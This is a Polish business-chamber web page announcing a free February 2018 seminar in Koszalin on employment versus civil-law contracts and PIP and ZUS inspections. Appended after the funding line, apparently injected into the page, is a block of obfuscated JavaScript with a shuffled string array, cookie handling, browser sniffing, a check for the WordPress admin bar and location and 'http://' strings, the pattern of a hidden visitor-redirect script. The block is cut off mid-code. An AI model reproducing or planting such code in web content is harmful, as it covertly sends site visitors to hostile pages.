Prawne Vademecum Przedsiębiorcy: Szkolenie „Umowy o pracę a umowy cywilnoprawne w świetle kontroli PIP i ZUS” | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,
Centrum Biznesu Fundacji CIP w Koszalinie ma przyjemność zaprosić wszystkich zainteresowanych przedsiębiorców na pierwsze w tym roku spotkanie w ramach  cyklu Prawne Vademecum Przedsiębiorcy.
Celem spotkania jest zapoznanie uczestników z obowiązującymi przepisami dotyczącymi zawierania umów, wskazanie podstawowych różnic między każda umową w celu uniknięcia odpowiedzialności przed organami nadzoru i kontroli. Mówić będziemy o praktycznych aspektach tego zagadnienia, m.in.
•       urlopy, delegacje itp.  osób mających zawarte umowy zlecenia i o dzieło;
•       czy każda umowa może był umową o dzieło lub zlecenia
•       uprawnienia pracownika a zleceniobiorcy
•       typowe uregulowania umów o dzieło i zlecenia – na co uważać?
•       umowa o przeniesienie praw autorskich jako kolejny typ umowy
•       jak formułować treść umów o dzieło, aby nie podważyła ich kontrola np. ZUS
•       BHP a umowy cywilnoprawne.
•       zmiana kwalifikacji umowy z dzieła na zlecenie – skutki praktyczne;
-dowody wykonania dzieła
•       problem z udokumentowaniem innego tytułu do ubezpieczeń
– oświadczenie zleceniobiorcy (prawidłowy wzór formularza)
•       Orzecznictwo Sądu Najwyższego w zakresie umów cywilnoprawnych oraz umów o pracę
•       przygotowanie dokumentacji pod względem kontroli Państwowej Inspekcji Pracy oraz Zakładu Ubezpieczeń Społecznych

Szkolenie poprowadzi Ewa Bielecka specjalista prawa pracy, długoletni pracownik działu prawnego Państwowej Inspekcji Pracy oddział w Koszalinie, wykładowca prawa pracy.

Na spotkanie zapraszamy w czwartek 8 lutego 2018w godz.10.00 – 12.00 do City Box, Rynek Staromiejski 14 Koszalin.
Udział w spotkaniu jest bezpłatny tylko po uprzednim potwierdzeniu uczestnictwa.  Liczba miejsc ograniczona, decyduje kolejność zgłoszeń.
Zgłoszenia można przesyłać mailowo na adres m.skrzypek@biznes.koszalin.pl   do 6 lutego 2018.
Formularz zgłoszeniowy do wypełnienia Formularz zgłoszenia Vademecum umowy.

Szczegółowe informacje na temat spotkania można uzyskać pod numerem telefonu: 94/3412317 lub 94/3471317 oraz na stronie internetowej www.biznes.koszalin.pl lub w biurze Centrum Biznesu, ul. Zwycięstwa 42 w Koszalinie, pokój 110

Zadanie dofinansowane z budżetu Gminy Miasta Koszalina 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m